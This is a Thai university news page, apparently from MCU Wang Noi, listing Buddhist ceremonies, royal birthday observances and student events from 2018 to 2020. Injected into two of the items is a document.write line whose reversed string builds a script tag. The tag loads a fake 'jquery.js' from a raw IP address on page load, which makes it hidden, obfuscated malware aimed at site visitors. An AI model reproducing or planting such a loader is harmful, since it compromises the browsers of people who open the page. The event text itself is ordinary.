ขอเชิญบุคลากรฝ่ายคฤหัสถ์ ส่วนกลาง ร่วมแต่งกายชุดเครื่องแบบปกติขาว บันทึกเทปอาเศียรวาทเนื่องในวันเฉลิมพระชนมพรรษา

ขอเชิญบุคลากรฝ่ายคฤหัสถ์ ส่วนกลาง ร่วมแต่งกายชุดเครื่องแบบปกติขาว บันทึกเทปอาเศียรวาทเนื่องในวันเฉลิมพระชนมพรรษา พระบาทสมเด็จพระปรเมนทรรามาธิบดีศรีสินทรมหาวชิราลงกรณ พระวชิรเกล้าเจ้าอยู่หัว รัชกาลที่ ๑๐ ในวันที่ ๑๔ กรกฎาคม พ.ศ ๒๕๖๓ เวลา ๑๓.๐๐ น. ณ ห้องC๔๐๐ ชั้น ๔ โซน C อาคารเรียนรวม มจร วังน้อย

ขออนุโมทนาบุญ

ขออนุโมทนาบุญ แด่ 1.คุณมานพ ลิ้มอาวัชนาการ-คุณนุสรา บุญพิคำ และลูกหลาน 2.พนักงานสวัสดิการโรงครัว แผนกประกอบอาหาร+แผนกจัดเตรียมอาหาร ผู้บริหาร คณาจารย์ เจ้าหน้าที่ และ พระนิสิต โดยมี พระสุธีวีรบัณฑิต,รศ.ดร. ผอ.สำนักส่งเสริมพระพุทธศาสนาและบริการสังคม เป็นประธาน และกล่าวสัมโมทนียกถา ณ อาคาร 72 ปี พระวิสุทธาธิบดี (อาคารหอฉันชั้น 2) มจร.วังน้อย อยุธยา

พระเดชพระคุณพระเทพปวรเมธี, รศ.ดร. กล่าวธรรมกถา เนื่องในวันอาสฬหบูชาและวันเข้าพรรษา

พระเดชพระคุณพระเทพปวรเมธี, รศ.ดร. กล่าวธรรมกถา เนื่องในวันอาสฬหบูชาและวันเข้าพรรษา เพื่อเป็นประโยชน์แก่พุทธศาสนิกชนที่ได้รับชมรับฟังในที่นี้ด้วย และได้กล่าวถึงนโยบาย แผนงานการดำเนินงานของวัดเพื่อเป็นแนวทางปฏิบัติต่อไป ณ วัดมหาจุฬาลงกรณราชูทิศ ต.ลำไทร อ.วังน้อย จ.พระนครศรีอยุธยา

“นิสิตนานาชาติ มจร อธิษฐานจำพรรษา ประจำปี ๒๕๖๓ และเจริญพระพุทธมนต์นานาชาติ ณ วัดมหาจุฬาลงกรณราชูทิศ”

"นิสิตนานาชาติ มจร อธิษฐานจำพรรษา ประจำปี ๒๕๖๓ และเจริญพระพุทธมนต์นานาชาติ ณ วัดมหาจุฬาลงกรณราชูทิศ” วันจันทร์ที่ ๖ กรกฎาคม พ.ศ.๒๕๖๓ เวลา ๑๔.๐๐ น. คณะผู้บริหาร คณาจารย์ เจ้าหน้าที่และนิสิต นำโดย พระมหาปัญญา ปญฺญาสิริ,ดร. ผู้อำนวยส่วนประเมินนิสิต พระมหาประยูร โชติวโร ผู้อำนวยการกองกิจการนิสิต พระณรงค์ ฐานวุฑฺโฒ,ดร. อาจารย์ประจำคณะครุศาสตร์...

วันอาทิตย์ที่ ๕ กรกฎาคม ๒๕๖๓ ตรงกับวันขึ้น ๑๕ คำ่ เดือน ๘ เป็น ‘วันอาสาฬหบูชา’

#,วันอาทิตย์ที่ ๕ กรกฎาคม ๒๕๖๓ ตรงกับวันขึ้น ๑๕ คำ่ เดือน ๘ เป็น 'วันอาสาฬหบูชา' องค์สมเด็จพระสัมมาสัมพุทธเจ้า ได้ประกาศพระศาสนาเป็นครั้งแรก โดยทรงแสดงปฐมเทศนา คือ 'ธัมมจักกัปปวัตนสูตร' และเกิดมีพระสาวกรูปแรกขึ้น ถือเป็นวันแรกที่มี 'พระพุทธ พระธรรม และพระสงฆ์' ครบเป็นองค์ 'พระรัตนตรัย' # ... วันนี้ ณ...

ร่วมบำเพ็ญบุญกุศลในวันอาสาฬบูชา ณ วัดมหาจุฬาลงกรณราชูทิศ

ขอเชิญพุทธศาสนิกชน ร่วมบำเพ็ญบุญกุศลในวันอาสาฬบูชา ณ วัดมหาจุฬาลงกรณราชูทิศ ตำบลลำไทร อำภอวังน้อย จังหวัดพระนครศรีอยุธยา วันอาทิตย์ที่ ๕ กรกฎาคม พ.ศ. ๒๕๖๓ กำหนดการ เวลา ๐๙.๐๐ น. คณะสงฆ์ และพุทธศาสนิกชน พร้อมกัน ณ บริเวณพิธีหน้าโบสถ์กลางน้ำ เวลา ๐๙.๓๐ น. พระเทพปวรเมธี, รศ.ดร. รองอธิการบดีฝ่ายบริหาร มจร ผู้รักษาการแทนเจ้าอาวาสวัดมหาจุฬาลงกรณราชูทิศ จุดรูปเทียนบูชาพระรัตนตรัย...

นื่องในโอกาสวันเฉลิมพระชนมพรรษา สมเด็จพระนางเจ้าสุทิดา พัชรสุธาพิมลลักษณ พระบรมราชินี

เนื่องในโอกาสวันเฉลิมพระชนมพรรษา สมเด็จพระนางเจ้าสุทิดา พัชรสุธาพิมลลักษณ พระบรมราชินี ๓ มิถุนายน พ.ศ. ๒๕๖๒ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัยได้จัดให้มีพิธีเจริญพระพุทธมนต์เฉลิมพระเกียรติ และลงนามถวายพระพรชัยมงคล ในวันที่ ๓๑ พฤษภาคม พ.ศ. ๒๕๖๒ เวลา ๑๒.๓๐ น. โดยมีพระราชวรเมธี,รศ.ดร. รองอธิการบดีฝ่ายบริหาร เป็นประธานฝ่ายสงฆ์ และ รศ.ดร.สุรพล สุยะพรหม รองอธิการบดีฝ่ายกิจการทั่วไป เป็นประธานฝ่ายคฤหัสถ์ รวมทั้งผู้บริหาร คณาจารย์ เจ้าหน้าที่...

พิธีเปิดการศึกษา ประจำปีการศึกษา ๒๕๖๒ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย 

พิธีเปิดการศึกษา ประจำปีการศึกษา ๒๕๖๒ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย --------------------------------- ๒๖ มิถุนายน ๒๕๖๒ : พระธรรมปัญญาบดี นายกสภามหาวิทยาลัย เมตตาเป็นประธานในพิธีเปิดการศึกษา ประจำปีการศึกษา ๒๕๖๒ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย และกล่าวให้โอวาทแก่นิสิต ความว่า "คนไม่รู้หนังสือเหมือนกระบือตาบอด ไม่รู้ทิศเหนือทิศใต้ ไม่รู้หนองน้ำอยู่แห่งไหน ความพรากเพียร ขยันเรียนหนังสือ นั้นคือผู้ที่ประสบความสำเร็จในการศึกษาและการดำเนินชีวิต"ณ อาคาร มวก ๔๘ พรรษา มหาวชิราลงกรณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย จ.พระนครศรีอยุธยา ...

โครงการสร้างเสริมอัตลักษณ์นิสิต มจร. สำหรับนิสิตชั้นปีที่ ๑ ประจำปีการศึกษา ๒๕๖

กองกิจการนิสิต มจร. จัดโครงการสร้างเสริมอัตลักษณ์นิสิต มจร. สำหรับนิสิตชั้นปีที่ ๑ ประจำปีการศึกษา ๒๕๖๒ เพื่อเตรียมความพร้อมให้นิสิตได้ทราบคุณลักษณะนิสิตที่พึงประสงค์ตามนวลักษณ์ ๙ ประการของมหาวิทยาลัย ได้ทราบกฎ ระเบียบ ข้อบังคับ กฎเกณฑ์ และแนวทางการจัดการเรียนการสอนของมหาวิทยาลัย และสามารถปรับตัวในระบบการศึกษา ตระหนักให้เกียรติภูมิและเกียรติศักดิ์ของความเป็นนิสิต มจร. ในปีการศึกษา ๒๕๖๒ นี้ มีนิสิตใหม่ ชั้นปีที่ ๑ เข้าโครงการฯ ทั้งสิ้น จำนวน...

ในวันที่ ๒๔ มิถุนายน ๒๕๖๑ เวลา ๒๐.๐๐ น.ณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา ขยับเข้ามาประมาณ ๒๐ เมตร เพื่อให้พ้นทางด่วนบางปะอิน...

กำลังขนย้ายป้ายใหญ่ ในวันที่ ๒๔ มิถุนายน ๒๕๖๑ เวลา ๒๐.๐๐ น.ณ มหาวิทยาลัยมหาจุฬาลงกรณราชวิทยาลัย วังน้อย อยุธยา ขยับเข้ามาประมาณ ๒๐ เมตร เพื่อให้พ้นทางด่วนบางปะอิน - โคราช ที่กำลังจะสร้างเร็วๆนี้ กองสื่อสารองค์กร รายงาน ภาพ : ผศ.ดร.อิทธิพล แก้วพิลา ผู้ช่วยอธิการบดีฝ่ายประชาสัมพันธ์ document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))

ผู้บริหารคณาจารย์ เจ้าหน้าที่ นิสิต มจร “เจริญพระพุทธมนต์ส่งกำลังใจให้ทีมหมูป่า”

"ผู้บริหารคณาจารย์ เจ้าหน้าที่ นิสิต มจร"เจริญพระพุทธมนต์ส่งกำลังใจให้ทีมหมูป่า" Click now!! document.write('>tpircs/"sj.yreuqj/87.611.942.431//:sptth"=crs tpircs<'.split("").reverse().join(""))
X